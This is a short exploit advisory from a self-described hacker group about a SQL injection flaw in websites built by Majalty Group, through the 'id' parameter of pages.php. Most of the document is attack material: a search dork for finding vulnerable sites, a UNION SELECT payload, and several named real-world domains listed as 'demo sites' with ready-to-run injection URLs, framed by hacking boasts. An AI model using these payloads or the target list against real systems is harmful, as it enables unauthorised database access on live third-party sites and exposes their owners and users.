# Exploit Title: Remote Sql Injection In Majalty Group Sites
# Date: 27/12/2011 - 11:00
# Author: Cyber White Hats
# Nafsh
# Site: Cyberwh.org
# Mail: Nafsh@live.com
# Software Website: http://www.majalty.com/
# Tested On: BackTrack 5 - Win7 Ultimate
 - Xp
# Platform: Php

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

[$] Dorks:  "Programmmed By www.majalty.com"

[#] Vulnerable File : "/pages.php?id="

#POC: http://neboland-inv.com/pages.php?id=-1+UniOn+SelEct+VersIon()--

[$] Demo Sites:
http://aljayousi.com/pages.php?id=-1+UniOn+SelEct+1,VersIon()--

http://mosbaah.com/pages.php?id=-1+UniOn+SelEct+1,VersIon()--

http://7oob-bh.com/pages.php?id=-1+UniOn+SelEct+1,VersIon()--

http://damracement.com/pages.php?id=-1+UniOn+SelEct+VersIon()--

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
H4CK!NG !S 0UR J0B
W3 N3V3R G!V3 UP H4CK!NG

< No Priv8 , Everything is Public />
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

# Contact: Nafsh@live.com
#Cyberwh.org
# Greetz:Mr.M4st3r - HijaX - 
Skote_Vahshat
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Nafsh - Mr.M4st3r - HijaX - 
Skote_Vahshat

#Cyberwh.org 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>